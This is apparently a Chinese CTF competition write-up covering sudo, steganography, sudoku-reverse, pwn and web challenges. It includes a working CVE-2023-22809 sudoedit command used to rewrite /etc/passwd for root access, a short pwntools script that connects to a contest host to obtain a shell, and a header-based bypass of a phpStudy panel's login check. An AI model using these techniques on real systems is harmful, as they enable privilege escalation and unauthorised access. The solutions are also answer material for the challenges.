MISC-sudo
题目描述:小楠楠是一个热爱技术的小姑娘,最近开始学习Linux系统中的sudo命令,希望能够更好地管理系统。然而,她并不知道在使用sudo时存在着潜在的网络安全隐患,这可能会给系统带来不必要的风险。因此,她决定进一步学习有关网络安全的知识,以更好地保护系统和数据的安全。小楠楠相信,只有不断学习和提高自己的技能,才能成为一名真正的技术专家。
首先sudo -l 查看是否有能root权限执行的内容:
根据题目描述和sudoedit /etc/GAMELAB
高搜了一下,怀疑考察的是CVE-2023-22809
xiaonannan@engine-1:/tmp$ EDITOR='nano -- /etc/passwd' sudoedit /etc/GAMELAB (然后这里编辑/etc/passwd文件,把数字改为0,我又把初始路径改为了/root) sudoedit: --: editing files in a writable directory is not permitted sudoedit: /etc/GAMELAB unchanged xiaonannan@engine-1:/tmp$ tail -1 /etc/passwd xiaonannan:x:0:0::/root:/bin/bash
再次访问题目链接输入用户名和密码,发现可以访问/root了,flag在根目录。
MISC-盲人隐藏了起来
给了12和34.mp4。从12的原始数据分析猜测同样是一个视频文件:
用010editor打开34.mp4,高搜一下十六进制值“65 65”,把“65 65”前面的内容都粘贴在12原始数据的前面,这样就补全了12,修改后缀名为mp4,可以正常打开视频,观看视频得到字符串ChunJiSai7k7kbibi@!
利用该字符串成功解开flag.zip,得到图片flag.png,用010editor打开flag.png在尾部找到key:chunqiu123
zsteg查看flag.png在b1,bgr,lsb,xy通道得到可疑符串。
zsteg flag.png -e b1,bgr,lsb,xy
得到flag:
所以key没有什么卵用^^
MISC-wordle
嗯猜真的。。
REVERSE-sum
9*9的数独矩阵,查看main()
中的matrix可以得到数独目前的数字:
530070000 600195000 098000060 800060003 400803001 700020006 060000280 000419005 000080079
0就是需要填写的位置,交给chatgpt解决数独得到:
534678912 672195348 198342567 859761423 426853791 713924856 961537284 287419635 345286179
把题目中0的位置的数字单独提取出来组成字符串,运行程序提交字符串得到flag。
468912723481342575971422657913948591537428763345261
PWN-p2048
不知道,问就是不会,次数多会溢出,一顿瞎敲碰到2048就会出shell。
from pwn import * io = remote('47.93.6.210',12723) payload = 'ds'*500 io.sendline(payload) io.interactive()
WEB-phpstudy
进来是小皮面板的后台登录口,因为没有加随机码所以显示404的状态。
添加请求头:X-Requested-With: XMLHttpRequest
绕过随机码验证,进入后台登陆页。
然后查阅文章以为是XSS死活打不进去歇逼了,后来才知道是1day,Q Q呜呜你们怎么都会做啊